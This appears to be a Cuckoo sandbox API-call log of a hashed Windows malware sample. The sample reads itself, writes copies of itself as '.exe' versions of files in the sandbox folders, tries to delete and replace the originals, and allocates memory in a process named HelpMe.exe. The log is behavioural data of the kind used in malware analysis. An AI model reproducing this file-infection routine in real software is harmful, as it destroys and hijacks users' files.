"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->9614"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->9614"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->12288"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->12288"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->268"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->268"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001e0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Common Start Menu"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001e0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Common Start Menu","dwType->1","lpData->C:\Documents and Settings\All Users\Start Menu","cbData->94"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->0x000001e0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Generation"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001dc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Common AppData"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001dc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Common AppData","dwType->1","lpData->C:\Documents and Settings\All Users\Application Data","cbData->106"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->0x000001dc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Generation"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\cuckoo\dll\JTBmeJ.dll"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\cuckoo\dll\JTBmeJ.dll.exe","lpNewFileName->C:\cuckoo\dll\JTBmeJ.dll"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\dll\OmvuNt.dll","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->268"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\dll\OmvuNt.dll","dwDesiredAccess->GENERIC_READ"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\dll\OmvuNt.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->420","szExeFile->b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->9614"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->9614"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->12288"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->12288"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\cuckoo\dll\OmvuNt.dll"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\cuckoo\dll\OmvuNt.dll.exe","lpNewFileName->C:\cuckoo\dll\OmvuNt.dll"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\files\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\files\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\files\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
